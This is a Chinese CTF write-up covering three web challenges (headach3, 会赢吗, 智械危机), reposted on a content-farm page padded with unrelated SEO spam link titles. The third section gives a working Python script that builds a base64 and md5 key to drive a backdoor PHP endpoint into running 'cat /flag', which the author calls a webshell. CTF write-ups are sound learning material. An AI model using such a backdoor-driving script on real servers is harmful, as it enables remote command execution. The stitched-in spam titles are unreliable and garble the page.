当前位置: 首页 > news >正文

网站建设:博采网络58同城官网

网站建设:博采网络,58同城官网,备案 网站名称 重复,wordpress创建数据库文章目录 week1headach3会赢吗智械危机 week1 headach3 根据提示,在页面的请求头里找到flag flag{You_Ar3_R3Ally_A_9ooD_d0ctor} 会赢吗 打开控制台,拿到第一部分flag 将地址栏改为提示,去到下一关 控制台调用函数,得到flag …

文章目录

  • week1
    • headach3
    • 会赢吗
    • 智械危机

week1

headach3

根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

在这里插入图片描述

会赢吗

打开控制台,拿到第一部分flag
在这里插入图片描述
将地址栏改为提示,去到下一关在这里插入图片描述
控制台调用函数,得到flag
在这里插入图片描述
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
在这里插入图片描述
看题解才发现原来是要修改if指向的条件值在这里插入图片描述
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入在这里插入图片描述
在这里插入图片描述
函数部分的逻辑好理解,接下来解释一下if部分的逻辑在这里插入图片描述
在这里插入图片描述在这里插入图片描述
所以我们所看到的当前网页其实就是else语句执行后的结果
在这里插入图片描述
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={'cmd':base_cmd,'key':key
}
responce=post(url,data=payload)
print(responce.text)
http://www.yayakq.cn/news/629615/

相关文章:

  • 哪个网站的域名到期直接注册dedecms免费模板
  • 网站建设分金手指专业三十适合手机浏览的wordpress主题
  • 珠海建设公司网站技术网站模版
  • 漳州做网站最便宜市场策划方案
  • php简单购物网站源码大气企业网站
  • 成都市网站建设服务商实力网站建设电话
  • 二次元网站模板广告网站建设网
  • 网站开发产品设计书做北京会所网站哪个好
  • 怎样给一个网站做专题策划专做农产品的网站有哪些
  • 建设网站 关于竣工结算的期限兼职网站建设 开源
  • 关于进行网站建设费用的请示廊坊建网站
  • 如何用模板做公司网站网站空间的选择
  • 怎么登录住房城乡建设部网站行业信息网站
  • 客户问 你们网站怎么做的江门seo代理商
  • 湖南网站营销优化开发网站建设不推广有用吗
  • 网站制作乛薇做网站一般使用什么算法
  • wp网站源码营销策划公司经营范围包括哪些
  • 西宁网站建设兼职做网站时空间的选择
  • 最新的新开传奇网站汽车租赁网站建设
  • 贵州城乡建设厅施工员报名网站茶酒行业网站建设
  • 做网站用什么写汽车网站建设需要多少钱
  • 律师网站建设与维护镇江网站关键字优化公司
  • 青鸟网站开发实例招聘网站开发背景
  • 怎么网站显示翻页代码衡水网站建设选哪家
  • 中国林业网站群建设工程嘉兴做外贸网站的公司
  • 金融公司网站开发自己做app软件开发
  • 公司网站建设站酷网线制作一般包括
  • 网站曝光率望野亭
  • 企业网站建设 cms亚马逊雨林生物
  • 做网站的需要注册商标吗手机网站比例尺寸